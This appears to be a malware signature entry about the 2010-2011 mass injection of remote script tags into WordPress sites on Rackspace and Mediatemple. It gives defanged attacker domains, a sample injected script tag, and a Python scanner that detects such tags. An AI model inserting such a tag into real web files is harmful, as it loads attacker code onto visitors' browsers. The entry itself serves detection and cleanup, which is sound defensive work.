
Malware entry: malware.rks_injection.2

Description: Malware injections related to massive hacks of websites hosted on Rackspace and Mediatemple back in 2010-2011

Loads malware from

hxxp://m3h.toolbarinc[.]com
hxxp://w7c5lrhqu.newsapis[.]us
hxxp://brown.smartenergymodel[.]com/js/jquery.min.js
hxxp://azure.smartenergymodel[.]com/js/jquery.min.js
hxxp://r91nu.emapis[.]org/js/jquery.min.js
hxxp://d0j.emapis[.]org/js/jquery.min.js
hxxp://khaki.smartenergymodel[.]com/js/jquery.min.js
hxxp://purple.gaindirectory[.]org/js/jquery.min.js
And other domains.

Typical injected code

<script src=hxxp://azure.smartenergymodel[.]com/js/jquery.min.js>

It infects .php, .html and .js files.
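
A detection sketch for this signature, added here as an example and not Sucuri's own scanner: it walks a site directory and flags script tags in .php, .html and .js files whose src host is one of the parent domains listed above or any subdomain of them. The function names and the sample input are constructed for illustration, and since the entry notes that other domains are used, a clean result does not prove a site is clean.

```python
import re
from pathlib import Path
# Parent domains from this entry's list, kept defanged in source and re-fanged at runtime.
DEFANGED = ["toolbarinc[.]com", "newsapis[.]us", "smartenergymodel[.]com",
            "emapis[.]org", "gaindirectory[.]org"]
BAD_DOMAINS = tuple(d.replace("[.]", ".") for d in DEFANGED)
TARGET_EXTS = {".php", ".html", ".js"}  # file types this entry says get infected

# src value of a <script> tag; quotes are optional because the typical injection omits them.
SCRIPT_SRC = re.compile(r"""<\s*script\b[^>]*?\bsrc\s*=\s*["']?\s*([^"'\s>]+)""", re.I)
HOST = re.compile(r"^(?:https?:)?//([^/:?#]+)", re.I)

def bad_host(src):
    """Return the host if src points at a listed domain or any subdomain of one."""
    m = HOST.match(src)
    if not m:
        return None  # relative URL, so a local script
    host = m.group(1).lower().rstrip(".")
    if any(host == d or host.endswith("." + d) for d in BAD_DOMAINS):
        return host
    return None

def scan_text(text):
    """Return (line_number, host) for every script tag loading from a listed domain."""
    hits = []
    for m in SCRIPT_SRC.finditer(text):
        host = bad_host(m.group(1))
        if host:
            hits.append((text.count("\n", 0, m.start()) + 1, host))
    return hits

def scan_tree(root):
    """Scan .php/.html/.js files under root; return {path: hits} for infected files."""
    found = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in TARGET_EXTS:
            hits = scan_text(p.read_text(errors="replace"))
            if hits:
                found[str(p)] = hits
    return found

# Constructed sample: a clean local script, an injected tag, and a lookalike host.
SAMPLE = (
    "<?php get_header(); ?>\n"
    '<script src="/wp-includes/js/jquery/jquery.min.js"></script>\n'
    f"<script src=http://azure.{BAD_DOMAINS[2]}/js/jquery.min.js></script>\n"
    f"<script src='//{BAD_DOMAINS[2]}.example/js/jquery.min.js'></script>\n"
)
```

Calling scan_tree on a web root returns a dictionary keyed by file path, so an empty dictionary means no tag matched the listed domains.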

Related links: http://blog.sucuri.net/2010/06/mass-attack-of-wordpress-blogs-on-rackspace.html
http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpress-blogs-on-rackspace/


Affecting: WordPress websites. Mostly on Rackspace and Mediatemple.

Mitigation
How to clean a hacked WordPress site


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb